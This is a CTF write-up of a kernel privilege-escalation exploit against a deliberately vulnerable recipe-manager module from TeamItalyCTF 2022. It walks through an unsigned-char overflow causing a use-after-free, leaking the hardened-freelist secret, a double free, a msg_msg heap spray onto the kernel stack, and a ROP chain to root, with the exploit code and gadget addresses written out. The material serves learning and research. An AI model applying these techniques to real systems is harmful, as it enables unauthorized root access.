Kernel - Family recipes
- Category: Kernel Pwn
- Vuln type: use-after-free / SLUB / freelist manipulation / KROP
- Solves: 1
This writeup documents my solution to this challenge from TeamItalyCTF 2022.
The challenge contains a kernel module that controls a small device exposing an allocator for “recipes”. The vuln chain abuses an unsigned-char counter overflow plus krealloc semantics to create a use-after-free of the recipes_list array, then corrupts kernel freelists within the SLUB allocator and eventually overlaps a controlled allocation over the kernel stack to install a ROP chain that calls prepare_kernel_cred(0) and commit_creds(), elevating execution to ring 0 before iretq-ing back to a userspace get_shell().
The challenge
- Target: x86_64 Linux kernel built without KASLR
- Kernel config: CONFIG_SLAB_FREELIST_HARDENED enabled
- No KASAN, SMEP, or SMAP protections
This challenge shipped a tiny Linux kernel module that registers a device /dev/chall acting as a "recipe manager": it allows you to allocate recipes, delete them, and read their contents. The central data structure is a global manager object with two fields:
struct manager {
    unsigned char num_of_recipes;
    recipe_t **recipes_list;
};
The manager is responsible for keeping pointers to recipe_t objects with the following layout:
typedef struct recipe {
    char *buf;
    unsigned long bufsize;
    unsigned int public;
    uid_t owner_uid;
} recipe_t;
The code section responsible for the allocation of a new recipe is the most interesting part:
idx = manager.num_of_recipes;
manager.num_of_recipes++;

if (manager.recipes_list == NULL) {
    tmp = kmalloc(sizeof(recipe_t *) * manager.num_of_recipes, GFP_KERNEL);
} else {
    tmp = krealloc(manager.recipes_list,
                   sizeof(recipe_t *) * manager.num_of_recipes,
                   GFP_KERNEL);
}

if (ZERO_OR_NULL_PTR(tmp)) {
    printk(KERN_INFO "[ERR] (Re)allocation failed\n");
    manager.num_of_recipes--;
    goto error;
}
manager.recipes_list = tmp;

recipe = kmalloc(sizeof(recipe_t), GFP_KERNEL);
buf = kmalloc(request.alloc.bufsize + 1, GFP_KERNEL);
recipe->buf = buf;
manager.recipes_list[idx] = recipe;
Here we have the main bug of the module. Notice how num_of_recipes is only an unsigned char. The number of recipe allocations is not limited, so after 255 allocations, incrementing the counter wraps it back to 0. That means:
krealloc(manager.recipes_list, sizeof(recipe_t*) * 0, GFP_KERNEL);
This is effectively krealloc(ptr, 0), which is defined to free the old allocation and return either NULL or the tiny ZERO_SIZE_PTR sentinel. If it returns NULL, the code logs an error but crucially does not clear the stale pointer: manager.recipes_list still points to freed memory, and the module continues to index into it. This dangling pointer is the entry point to exploitation.
Exploit
Since this challenge is built without KASLR, the addresses of functions, gadgets, and heap objects can be found by reading /proc/kallsyms.
To make exploitation faster I implemented small wrappers for the device operations. Each one mirrors a module ioctl but hides the boilerplate, making it easier to chain primitives:
* alloc_recipe allocates a recipe and writes attacker-controlled data.
* free_recipe deletes a recipe at a given index.
* read_recipe returns raw bytes from a recipe’s buffer, perfect for leaking heap metadata.
* info_recipe returns the metadata of a recipe, such as bufsize, owner_uid and public.
void dev_alloc(char *buf, unsigned long bufsize, unsigned int public) {
    request_t req;
    req.alloc.buf = buf;
    req.alloc.bufsize = bufsize;
    req.alloc.public = public;
    if (ioctl(fd, CMD_ALLOC, &req) < 0)
        perror("ioctl CMD_ALLOC");
}

void dev_delete(unsigned long idx) {
    request_t req;
    req.delete.idx = idx;
    if (ioctl(fd, CMD_DELETE, &req) < 0)
        perror("ioctl CMD_DELETE");
}

void dev_read(char *buf, unsigned long bufsize, unsigned long idx) {
    request_t req;
    req.read.buf = buf;
    req.read.bufsize = bufsize;
    req.read.idx = idx;
    if (ioctl(fd, CMD_READ, &req) < 0)
        perror("ioctl CMD_READ");
}

request_t dev_info(unsigned long idx) {
    request_t req;
    req.info.idx = idx;
    if (ioctl(fd, CMD_INFO, &req) < 0)
        perror("ioctl CMD_INFO");
    return req;
}
Integer overflow and UAF
Step one is simple: allocate 255 + 1 recipes. After the 256th allocation, the counter overflows, krealloc(..., 0) frees the array, and recipes_list dangles. From now on, any operation that expects a valid pointer will instead dereference freed memory. The size and content of the payload are not important for now.
for (int i = 0; i < 256; i++) {
    alloc_recipe(fd, 0x100, payload);
}
By this point the array has long since grown past 1 KiB and ended up allocated in the 2k general-purpose slab. The freed slot is linked back onto the slab freelist, ready to be reused by attacker-controlled allocations.
Overlapping controlled data
Given that each recipe also contains a recipe->buf allocated with a user-chosen size, we can allocate new buffers that overlap with the freed recipes_list region. Writing into such a buffer then effectively overwrites entries of the recipes_list array.
For our buffer to be served from the 2k freelist we need to request an object of at least 1025 bytes. Even though MAX_BUFSIZE is 1024, the kernel module adds one byte for the 0x00 string terminator, letting us make kmalloc request exactly 1025 bytes:
buf = kmalloc(sizeof(char) * request.alloc.bufsize + 1, GFP_KERNEL);
That gives us control over the first 128 recipes_list[i] pointers. If we set one to point to a fake recipe_t under our control, the module will happily use it.
Leaking the freelist secret
The objective now is to insert a fake chunk into the freelist. However, due to a mitigation built into the kernel, we cannot directly modify the FD pointer of a freed object: we first need to obfuscate the pointer to the target memory we want to overlap, and to do that we must leak the secret used for the obfuscation.
The mitigation is CONFIG_SLAB_FREELIST_HARDENED, and by reading the Linux source code we can easily see what it does. Instead of storing the raw next pointer inside the free object, the allocator XORs it with its storage address and a per-cache secret (obf = next ^ swab(&next) ^ secret) before writing it to memory; when the allocator consumes the pointer, the same operation is performed.
The swab function simply performs a byte-wise reversal of the pointer’s value: each byte is mirrored end-to-end, so the most significant byte becomes the least significant, the second most significant becomes the second least, and so on.
// obfuscation
stored = next ^ swab(&next) ^ secret
// deobfuscation
next = stored ^ swab(&stored) ^ secret
static inline freeptr_t freelist_ptr_encode(const struct kmem_cache *s,
                                            void *ptr, unsigned long ptr_addr)
{
    unsigned long encoded;
#ifdef CONFIG_SLAB_FREELIST_HARDENED
    encoded = (unsigned long)ptr ^ s->random ^ swab(ptr_addr);
#else
    encoded = (unsigned long)ptr;
#endif
    return (freeptr_t){.v = encoded};
}
There is a subtle weakness here. If we can leak the content of the last free chunk in the freelist, we already know that the original next pointer for that chunk is 0x0 (since it’s the end of the list). If we also know the address of that chunk, we can trivially derive the secret used in the pointer obfuscation:
secret = obfuscated ^ swab(address) ^ 0x00
In our case, given that KASLR is disabled, it's even easier: we already know the address of every FD pointer and where it points in memory. All we need is a way to read the content of a free object.
Luckily, the module provides a read primitive that lets us leak arbitrary memory locations:
} else if (cmd == CMD_INFO) {
    request.info.bufsize = recipe->bufsize;
    request.info.owner_uid = recipe->owner_uid;
    request.info.public = recipe->public;
    if (copy_to_user((request_t *)arg, (const request_t *)&request, sizeof(request))) {
        printk(KERN_INFO "[CHALL] [ERR] Copy to user failed\n");
        goto error;
    }
If we arrange for one of the recipes_list[idx] entries we overwrote to point into freed slab memory, so that recipe->bufsize overlaps with an obfuscated freelist pointer, we can call dev_info() to leak that pointer. Given that KASLR is disabled, we also know the address of the chunk we freed and where it points to, so we can always reverse the encoding and recover the secret.
memset(msg, 0x41, 1024);
*((unsigned long *)msg + 0) = 0xffff888003b75bf8; // ptr to the leak (minus 0x8)
dev_alloc(msg, 1024, 1);

// Leak the obfuscated pointer in the freelist
request_t req = dev_info(0);

// Extract the secret
unsigned long encrypted = req.info.bufsize;
unsigned long decrypted = 0xffff888003b76000;
unsigned long position  = 0xffff888003b75c00;
unsigned long secret    = encrypted ^ swab64(position) ^ decrypted;
Forging a freelist entry
Since we can't modify recipes that are already allocated, injecting our pointer into the freelist now also requires a double free, which would let us request the same object twice, change its next pointer, and insert our fake chunk into the freelist.
To achieve this we can simply overwrite entries in recipes_list[] so the module ends up calling kfree() on the same object twice (i.e., point two different array slots at the same address and call CMD_DELETE on both).
Before that we need to consider the following mitigation in the kernel function set_freepointer(), invoked by kfree():
static inline void set_freepointer(struct kmem_cache *s, void *object, void *fp)
{
    unsigned long freeptr_addr = (unsigned long)object + s->offset;

#ifdef CONFIG_SLAB_FREELIST_HARDENED
    BUG_ON(object == fp); /* naive detection of double free or corruption */
#endif
    freeptr_addr = (unsigned long)kasan_reset_tag((void *)freeptr_addr);
    *(freeptr_t *)freeptr_addr = freelist_ptr_encode(s, fp, freeptr_addr);
}
That BUG_ON(object == fp) simply compares the address being freed with the current freelist head: it will catch the trivial case where kfree(obj) is immediately followed by kfree(obj) again. But it doesn’t catch more subtle sequences where the same object is freed twice with other frees happening in between, because the freelist head will have changed.
To exploit this reliably we can craft a fake recipe_t structure, intentionally placed at the start of the (freed) array, and then make another array entry point to it. The fake struct we write into the overlapped recipes_list region looks like a normal recipe_t but with recipe->buf set to a pointer to another valid memory location.
The freeing order matters: we first free the overlapping object that occupies the beginning of the array (so the slot holding our fake struct now lies inside a free object), and then we delete the fake recipe struct itself. Because the fake recipe has a valid recipe->buf pointer, the module frees that buffer first and only then frees the struct body. Crucially, the immediate check BUG_ON(object == fp) does not trigger, because these last two frees are not targeting the same memory location.
Once that forged entry sits in the freelist, normal kmalloc calls of the same size will eventually pop it and return an object at that location without further checks.
// Allocate a recipe buffer over the array, clearing 128 entries and inserting the fake struct
memset(msg, 0x41, 1024);
*((unsigned long *)msg + 0) = 0xffff888003b75800; // fake recipe->buf (another valid location)
*((unsigned long *)msg + 1) = 8;                  // fake recipe->bufsize
*((unsigned long *)msg + 2) = 0x000003e800000001; // fake public / owner_uid
*((unsigned long *)msg + 4) = 0xffff888003b75000; // ptr to the fake struct for the double free (idx 4)
*((unsigned long *)msg + 6) = 0xffff888003b75bf8; // ptr to the fake struct for the leak (idx 6)
dev_alloc(msg, 1024, 1);

// Leak the obfuscated pointer in the freelist
request_t req = dev_info(6);

// Extract the secret
unsigned long encrypted = req.info.bufsize;
unsigned long decrypted = 0xffff888003b76000;
unsigned long position  = 0xffff888003b75c00;
unsigned long secret    = encrypted ^ swab64(position) ^ decrypted;

// Free the object overlapping the array
dev_delete(254);
// DOUBLE FREE! Deleting the fake recipe frees the same chunk a second time
dev_delete(4);
Allocating onto the kernel stack
At this stage, the object at the head of the 2k freelist is linked into the list twice. We now need to request it once and modify the content of its FD pointer. Allocating a regular recipe won’t work here because we are allowed to write at most 1024 bytes, so the position of the FD pointer is out of reach.
Fortunately, we can leverage other kernel structures, such as msg_msg. Using System V IPC messages, we have full control over the size of the msg_msg struct allocated when enqueuing a message, and since it contains user input it will be requested from the same general-purpose cache.
The FD pointer is located at offset 0x400. Accounting for the msg_msg header (0x30) and the extra 8 bytes expected by msgsnd at the start of the message, the final offset becomes:
0x400 - 0x30 + 0x8 = 0x3d8
Without KASLR, we can insert an object into the freelist so that it lands exactly on the kernel stack, starting from the return address of copy_from_user().
unsigned long stack_end = 0xffffc900001d0000;
unsigned long target = stack_end - 0x410;
unsigned long obfuscated = target ^ swab64(0xffff888003b75400) ^ secret;

memset(msg, 0x41, 984);
*(unsigned long *)(msg + 974 + 8) = obfuscated;

key_t key = ftok("/", 0);
printf("key: %d\n", key);
int msgid = msgget(key, 0666 | IPC_CREAT);
if (msgid == -1) { perror("msgget"); }
if (msgsnd(msgid, &msg, 984, 0) == -1) {
    perror("msgsnd");
}
Kernel ROP
Before triggering the ROP chain we need to save the program state for the iretq, which will pop RIP, CS, RFLAGS, RSP, and SS.
long user_cs;
long user_ss;
long user_sp;
long user_rflags;

void save_state() {
    __asm__(
        ".intel_syntax noprefix;"
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp, rsp;"
        "pushf;"
        "pop user_rflags;"
        ".att_syntax;"
    );
    puts("[*] Saved state");
}

save_state();
We also need a handler to execute when returning to userland.
void get_shell(int sig) {
    puts("[*] Returned to userland");
    system("/bin/sh");
}
signal(SIGSEGV, get_shell);
Now we can create more recipes, requesting 2k-sized objects until one lands on the stack, and write a ROP chain that does the following:
- Set up and call prepare_kernel_cred(0), which returns a cred * in rax representing root credentials.
- Call commit_creds(rax) to replace the current task credentials with the new root credentials.
- Call spin_unlock(&lock) to release the kernel lock that is still held on lock.
- Execute swapgs; ret to restore the GS base appropriate for returning to user mode (required before an iretq).
- Return to userland safely with iretq, building a fake iretq stack frame on the kernel stack: [RIP = get_shell, CS, RFLAGS, RSP, SS].
memset(msg, 0xff, 1024);
*(unsigned long *)(msg) = 0xffffffff8106ab4d; // pop rdi; ret;

unsigned long *rop = (unsigned long *)(msg + 688);
int k = 0;
rop[k++] = 0xffffffff8106ab4d;   // pop rdi; ret;
rop[k++] = 0x00;
rop[k++] = 0xffffffff81096110;   // prepare_kernel_cred(0)
rop[k++] = 0xffffffff8102b013;   // pop rcx; ret;
rop[k++] = stack_end - 0x410;    // where the "pop rdi" gadget address was placed earlier
rop[k++] = 0xffffffff812d5b52;   // push rax; jmp qword ptr [rcx];
rop[k++] = 0xffffffff81095c30;   // commit_creds(prepare_kernel_cred(0))
rop[k++] = 0xffffffff8106ab4d;   // pop rdi; ret;
rop[k++] = 0xffffffffc00024d0;   // &lock
rop[k++] = 0xffffffff81ca0580;   // spin_unlock
rop[k++] = 0xffffffff81c93263;   // swapgs; ret
rop[k++] = 0xffffffff8102b4df;   // iretq; ret;
rop[k++] = (unsigned long)get_shell;
rop[k++] = user_cs;
rop[k++] = user_rflags;
rop[k++] = user_sp;
rop[k++] = user_ss;
dev_alloc(msg, 1024, 1);